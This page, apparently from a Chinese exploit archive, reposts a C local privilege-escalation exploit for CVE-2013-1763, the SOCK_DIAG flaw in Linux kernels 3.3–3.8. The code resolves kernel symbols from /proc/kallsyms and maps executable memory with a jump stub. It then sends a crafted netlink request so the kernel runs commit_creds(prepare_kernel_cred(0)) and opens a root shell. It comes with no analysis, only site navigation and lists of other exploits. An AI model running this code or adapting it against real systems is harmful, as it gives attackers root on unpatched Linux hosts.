首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Fedora Linux SOCK_DIAG Local Root
来源:vfocus.net 作者:Weksteen 发布时间:2013-03-15  

/*
* CVE-2013-1763 SOCK_DIAG bug in kernel 3.3-3.8
* This exploit uses nl_table to jump to a known location
*/

#include <unistd.h>
#include <sys/socket.h>
#include <linux/netlink.h>
#include <netinet/tcp.h>
#include <errno.h>
#include <linux/if.h>
#include <linux/filter.h>
#include <string.h>
#include <stdio.h>
#include <stdlib.h>
#include <linux/sock_diag.h>
#include <linux/inet_diag.h>
#include <linux/unix_diag.h>
#include <sys/mman.h>

typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);
_commit_creds commit_creds;
_prepare_kernel_cred prepare_kernel_cred;
unsigned long sock_diag_handlers, nl_table;

int __attribute__((regparm(3)))
kernel_code()
{
    commit_creds(prepare_kernel_cred(0));
    return -1;
}

unsigned long
get_symbol(char *name)
{
    FILE *f;
    unsigned long addr;
    char dummy, sym[512];
    int ret = 0;
 
    f = fopen("/proc/kallsyms", "r");
    if (!f) {
        return 0;
    }
 
    while (ret != EOF) {
        ret = fscanf(f, "%p %c %s\n", (void **) &addr, &dummy, sym);
        if (ret == 0) {
            fscanf(f, "%s\n", sym);
            continue;
        }
        if (!strcmp(name, sym)) {
            printf("[+] resolved symbol %s to %p\n", name, (void *) addr);
            fclose(f);
            return addr;
        }
    }
    fclose(f);
 
    return 0;
}

int main(int argc, char*argv[])
{
    int fd;
    unsigned family;
    struct {
        struct nlmsghdr nlh;
        struct unix_diag_req r;
    } req;
    char    buf[8192];

    if ((fd = socket(AF_NETLINK, SOCK_RAW, NETLINK_SOCK_DIAG)) < 0){
        printf("Can't create sock diag socket\n");
        return -1;
    }

    memset(&req, 0, sizeof(req));
    req.nlh.nlmsg_len = sizeof(req);
    req.nlh.nlmsg_type = SOCK_DIAG_BY_FAMILY;
    req.nlh.nlmsg_flags = NLM_F_ROOT|NLM_F_MATCH|NLM_F_REQUEST;
    req.nlh.nlmsg_seq = 123456;

    req.r.udiag_states = -1;
    req.r.udiag_show = UDIAG_SHOW_NAME | UDIAG_SHOW_PEER | UDIAG_SHOW_RQLEN;

    commit_creds = (_commit_creds) get_symbol("commit_creds");
    prepare_kernel_cred = (_prepare_kernel_cred) get_symbol("prepare_kernel_cred");
    sock_diag_handlers = get_symbol("sock_diag_handlers");
    nl_table = get_symbol("nl_table");
     
    if(!prepare_kernel_cred || !commit_creds || !sock_diag_handlers || !nl_table){
        printf("some symbols are not available!\n");
        exit(1);
    }

    family = (nl_table - sock_diag_handlers) / 8;
    printf("family=%d\n",family);
    req.r.sdiag_family = family;
     
    if(family>255){
        printf("nl_table is too far!\n");
        exit(1);
    }

    unsigned long mmap_start, mmap_size;
    mmap_start = 0x100000000;
    mmap_size = 0x200000;
    printf("mmapping at 0x%lx, size = 0x%lx\n", mmap_start, mmap_size);

    if (mmap((void*)mmap_start, mmap_size, PROT_READ|PROT_WRITE|PROT_EXEC,
        MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) == MAP_FAILED) {
        printf("mmap fault\n");
        exit(1);
    }
    memset((void*)mmap_start, 0x90, mmap_size);

    char jump[] = "\x55"                          // push %ebp
                  "\x48\x89\xe5"                  // mov %rsp, %rbp
                  "\x48\xc7\xc0\x00\x00\x00\x00"  // movabs 0x00, %rax
                  "\xff\xd0"                      // call *%rax
                  "\x5d"                          // pop %rbp
                  "\xc3";                         // ret


    unsigned int *asd = (unsigned int*) &jump[7];
    *asd = (unsigned int)kernel_code;
    printf("&kernel_code = %x\n", (unsigned int) kernel_code);

    memcpy( (void*)mmap_start+mmap_size-sizeof(jump), jump, sizeof(jump));

    if ( send(fd, &req, sizeof(req), 0) < 0) {
        printf("bad send\n");
        close(fd);
        return -1;
    }

    printf("uid=%d, euid=%d\n",getuid(), geteuid() );

    if(!getuid())
        system("/bin/sh");

}

 


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Ruby Gem Curl Command Executio
·Google Chrome 21.0.1180.57 NUL
·Ruby Gem Minimagic Command Exe
·Nitro Pro 8.0.3.1 - Crash PoC
·Ruby Gem Fastreader 1.0.8 Comm
·OpenPLI Webif Arbitrary Comman
·Linux Kernel 'SCTP_GET_ASSOC_S
·Sami FTP Server LIST Command B
·Microsoft Office PowerPoint 20
·Sami FTP Server 2.0.1 PUT Comm
·Honeywell HSC Remote Deployer
·Cool PDF Image Stream Buffer O
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved